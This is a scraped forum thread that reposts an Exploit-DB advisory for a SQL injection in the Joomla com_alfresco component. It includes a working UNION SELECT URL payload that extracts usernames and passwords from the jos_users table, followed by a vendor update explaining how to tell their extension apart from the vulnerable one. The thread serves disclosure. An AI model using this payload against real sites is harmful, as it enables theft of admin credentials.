topic Joomla Component com_alfresco SQL Injection Vulnerability in Alfresco Archive https://connect.hyland.com/t5/alfresco-archive/joomla-component-com-alfresco-sql-injection-vulnerability/m-p/230897#M184027 <HTML><HEAD></HEAD><BODY><A href="http://www.exploit-db.com/exploits/10952" rel="nofollow noopener noreferrer">http://www.exploit-db.com/exploits/10952</A><BR /><BR /><SPAN># Title: Joomla Component com_alfresco SQL Injection Vulnerability </SPAN><BR /><SPAN># EDB-ID: 10952 </SPAN><BR /><SPAN># CVE-ID: () </SPAN><BR /><SPAN># OSVDB-ID: () </SPAN><BR /><SPAN># Author: FL0RiX </SPAN><BR /><SPAN># Published: 2010-01-03 </SPAN><BR /><SPAN># Verified: no </SPAN><BR /><SPAN># Download Exploit Code</SPAN><BR /><SPAN># Download N/A</SPAN><BR /><SPAN>#############################################################</SPAN><BR /><SPAN>#&nbsp; Joomla Component com_alfresco SQL Injection Vulnerability</SPAN><BR /><SPAN>#############################################################</SPAN><BR /><SPAN># Author&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; : FL0RiX</SPAN><BR /><SPAN># Name&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; : com_alfresco</SPAN><BR /><SPAN># Greez&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; : PyskE,Dr.Kacak And All Friends</SPAN><BR /><SPAN># Bug Type&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; : SQL Injection</SPAN><BR /><SPAN># Infection&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; : Admin login bilgileri alinabilir.</SPAN><BR /><SPAN># Demo Vuln.&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; :</SPAN><BR /><A href="http://server/index.php?option=com_alfresco&amp;task=edit&amp;id_pan=" rel="nofollow noopener noreferrer">http://server/index.php?option=com_alfresco&amp;task=edit&amp;id_pan=</A><SPAN>[SQL INJ.]</SPAN><BR /><SPAN># Bug Fix Advice : Zararli karakterler filtrelenmelidir.</SPAN><BR /><SPAN>#############################################################</SPAN><BR /><SPAN>&lt; – bug code start – &gt;</SPAN><BR /><SPAN>path/index.php?option=com_alfresco&amp;task=edit&amp;id_pan=null/**/union/**/select/**/1,2,3,concat(username,0x3a,password)fl0rixf0r3v3r,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21/**/from/**/jos_users–</SPAN><BR /><SPAN>&lt; – bug code end of – &gt;</SPAN><BR /><BR /><SPAN>How to rectify an error?</SPAN><BR /><BR /><BR /><STRONG>Update:</STRONG><BR /><A href="http://blog.joomlatools.eu/2010/01/security-in-third-party-addons.html" rel="nofollow noopener noreferrer">http://blog.joomlatools.eu/2010/01/security-in-third-party-addons.html</A><BR /><SPAN>"We have investigated this report, and it does not concern the Joomla:Alfresco integration that was published through Joomlatools Labs over a year ago. We have been unable to find the developer of this extension, so we believe it might be a custom extension that is not available on the JED. If you have more information, please let us know.</SPAN><BR /><BR /><SPAN>If you have an Alfresco extension installed, you can identify it by opening /administrator/components/com_alfresco/manifest.xml. If it starts with the following header, you are using our secure extension. If it doesn't, you might be using the vulnerable extension.</SPAN><BR /><BR /><SPAN>&lt;name&gt;Alfresco&lt;/name&gt;</SPAN><BR /><SPAN>&lt;author&gt;Joomlatools&lt;/author&gt;</SPAN><BR /><SPAN>&lt;copyright&gt;Copyright (C) 2008 Joomlatools. All rights reserved.&lt;/copyright&gt;</SPAN><BR /><SPAN>&lt;creationdate&gt;December 2008&lt;/creationdate&gt;</SPAN><BR /><SPAN>&lt;license&gt;</SPAN><A href="http://www.gnu.org/licenses/gpl-2.0.html" rel="nofollow noopener noreferrer">http://www.gnu.org/licenses/gpl-2.0.html</A><SPAN> GNU/GPL&lt;/license&gt;</SPAN><BR /><SPAN><SPAN>&lt;authoremail&gt;</SPAN><A class="jive-link-email-small" href="mailto:info@joomlatools.org" rel="nofollow noopener noreferrer">info@joomlatools.org</A><SPAN>&lt;/authoremail&gt;</SPAN></SPAN><BR /><SPAN>&lt;authorurl&gt;</SPAN><A href="http://www.joomlatools.org" rel="nofollow noopener noreferrer">www.joomlatools.org</A><SPAN>&lt;/authorurl&gt;</SPAN><BR /><SPAN>&lt;version&gt;1.0.0&lt;/version&gt;</SPAN><BR /><SPAN>&lt;description&gt;This component displays an Alfresco repository using CMIS&lt;/description&gt;</SPAN><BR /><SPAN>"</SPAN></BODY></HTML> Tue, 19 Jan 2010 10:56:14 GMT morze 2010-01-19T10:56:14Z Joomla Component com_alfresco SQL Injection Vulnerability https://connect.hyland.com/t5/alfresco-archive/joomla-component-com-alfresco-sql-injection-vulnerability/m-p/230897#M184027 http://www.exploit-db.com/exploits/10952# Title: Joomla Component com_alfresco SQL Injection Vulnerability # EDB-ID: 10952 # CVE-ID: () # OSVDB-ID: () # Author: FL0RiX # Published: 2010-01-03 # Verified: no # Download Exploit Code# Download N/A######################################################## Tue, 19 Jan 2010 10:56:14 GMT https://connect.hyland.com/t5/alfresco-archive/joomla-component-com-alfresco-sql-injection-vulnerability/m-p/230897#M184027 morze 2010-01-19T10:56:14Z Re: Joomla Component com_alfresco SQL Injection Vulnerability https://connect.hyland.com/t5/alfresco-archive/joomla-component-com-alfresco-sql-injection-vulnerability/m-p/230898#M184028 <HTML><HEAD></HEAD><BODY><SPAN>Thanks for this nice post. this is so useful for me.</SPAN></BODY></HTML> Fri, 26 Feb 2010 10:34:52 GMT https://connect.hyland.com/t5/alfresco-archive/joomla-component-com-alfresco-sql-injection-vulnerability/m-p/230898#M184028 hax2010 2010-02-26T10:34:52Z